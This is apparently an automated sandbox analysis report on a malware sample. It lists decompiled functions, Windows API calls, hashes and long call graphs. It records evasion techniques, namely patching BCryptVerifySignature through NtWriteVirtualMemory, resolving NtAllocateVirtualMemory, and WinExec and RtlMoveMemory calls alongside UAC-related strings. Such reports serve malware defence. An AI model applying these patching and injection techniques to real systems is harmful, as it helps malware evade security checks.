                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5C79
                                                                                                                            • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5C9F
                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5CAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                            • API String ID: 1759228003-3917250287
                                                                                                                            • Opcode ID: 16e54660c3c250cf27add3b4bad80f8b977d092432b674f32e6fec11d93564b2
                                                                                                                            • Instruction ID: 6b780af5619e30e0525a504d184fe80fca722e9eaffa2bd9be431d16b0385779
                                                                                                                            • Opcode Fuzzy Hash: 16e54660c3c250cf27add3b4bad80f8b977d092432b674f32e6fec11d93564b2
                                                                                                                            • Instruction Fuzzy Hash: 2F51687DE4021C7AFB25D6A8CC56FEF77AD9B04744F8001A1A608E6181EF78DA848F65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12088 28b7ac0-28b7adb LoadLibraryW 12089 28b7b0a-28b7b12 12088->12089 12090 28b7add-28b7ae6 GetProcAddress 12088->12090 12091 28b7ae8-28b7b00 NtWriteVirtualMemory 12090->12091 12092 28b7b04-28b7b05 FreeLibrary 12090->12092 12091->12092 12093 28b7b02 12091->12093 12092->12089 12093->12092
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC,ScanString,02904360,028B9A30), ref: 028B7AD2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                            • NtWriteVirtualMemory.NTDLL(02904388,00000000,?,00000001,?), ref: 028B7AF6
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC), ref: 028B7B05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                                                                            • API String ID: 1002360270-4067648912
                                                                                                                            • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                            • Instruction ID: 73342a6e248a7cc4d0edf143eb41f69e1bb43da48dfe3d3b25ce73901cb647c7
                                                                                                                            • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                            • Instruction Fuzzy Hash: 87F0E27E6093243EE622612C5C80EFFA29DCFC27A1F04462DF558E6280EB618804C7B2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            Strings
                                                                                                                            • NtAllocateVirtualMemory, xrefs: 028B796B
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 028B7970
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                            • Opcode ID: ebd32a87d1cfe806aec13099d63a5c5ce7dfab145f833b55d9b931cd1d7c764f
                                                                                                                            • Instruction ID: cbd97bb4eb0d9f4e1b73a7b0ba35ee1198be883865a20a0d9ccb4a293ea34d21
                                                                                                                            • Opcode Fuzzy Hash: ebd32a87d1cfe806aec13099d63a5c5ce7dfab145f833b55d9b931cd1d7c764f
                                                                                                                            • Instruction Fuzzy Hash: F5E09ABA64030CBFEB01EEACDC85EEA77ACAB0C611F045415BA19D7205DA74E9508BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            Strings
                                                                                                                            • NtAllocateVirtualMemory, xrefs: 028B796B
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 028B7970
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                            • Opcode ID: 89fb08ff24d373875133f56034a3cd0e256f1483ce99151a4b2e1cdba8d38465
                                                                                                                            • Instruction ID: c69abd50d24a7beb0f602d8227b6bbf274cbdfb4c74c737420210ca79bbe489a
                                                                                                                            • Opcode Fuzzy Hash: 89fb08ff24d373875133f56034a3cd0e256f1483ce99151a4b2e1cdba8d38465
                                                                                                                            • Instruction Fuzzy Hash: DAE09ABA54030CBFEB01EE9CD885EDA77ACAB0C611F045415BA19D7205DA74E5508BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028BC4DC Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC517
                                                                                                                            • NtClose.NTDLL(?), ref: 028BC591
                                                                                                                              • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(?), ref: 028A4C32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$CloseFreeNameName_String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 11680810-0
                                                                                                                            • Opcode ID: 29b49d90609c7a610ecad9c540a3bc2426421d618950ac00d8b12edb9ea773bb
                                                                                                                            • Instruction ID: 0dcf7844a6b309b9e1a9489e9020ae0ac03a6c42b76b23827dae3d7b0f71fbf5
                                                                                                                            • Opcode Fuzzy Hash: 29b49d90609c7a610ecad9c540a3bc2426421d618950ac00d8b12edb9ea773bb
                                                                                                                            • Instruction Fuzzy Hash: 96219279A507087EEB11EAD8CC52FDEB7BDAF48700F540466B604E72C0DAB4BA058B65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028C1ABA Relevance: 45.0, APIs: 2, Strings: 22, Instructions: 2961sleepprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 5665 28c1aba-28c2d78 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4964 call 28a4698 call 28a7e18 6174 28c2d7e-28c3340 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4964 call 28a3208 call 28bca6c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 Sleep call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4964 call 28a4d38 call 28bc368 call 28a4964 call 28a4d38 call 28bc368 call 28a4964 call 28a4d38 call 28bc368 call 28a4964 call 28a4d38 call 28bc368 call 28a4964 call 28a4d38 call 28bc368 call 28a4964 call 28a4d38 call 28bc368 call 28a4d38 call 28bc368 call 28a4d38 call 28bc368 call 28a4d38 call 28bc368 call 28a4d38 call 28bc368 5665->6174 6175 28c3345-28c3c13 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc78c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7a88 call 28bd270 call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28bd20c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 5665->6175 6174->6175 6615 28c3c19-28c3c5e call 28a4824 call 28a4964 call 28a4698 call 28a7e18 6175->6615 6616 28c53e0-28c565b call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 6175->6616 6615->6616 6633 28c3c64-28c4571 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 WinExec call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 6615->6633 6762 28c6190-28c638f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 6616->6762 6763 28c5661-28c5cb3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a47b0 call 28a4964 WinExec call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4964 call 28a4698 call 28b9e70 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3694 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6616->6763 7568 28c47d5-28c4ef6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3694 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a2f08 call 28a794c call 28a47b0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2f08 call 28a794c call 28a47b0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a36c4 6633->7568 7569 28c4577-28c47d0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4d38 call 28a4da4 call 28a4728 call 28bc3f8 6633->7569 6938 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 6762->6938 6939 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6762->6939 7504 28c5cba-28c5f98 call 28b5aa8 call 28a4b90 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc RtlMoveMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28ba1c0 call 28a36c4 6763->7504 7505 28c5cb5-28c5cb8 6763->7505 7120 28c6cdd-28c6cec call 28a48b0 6938->7120 7121 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 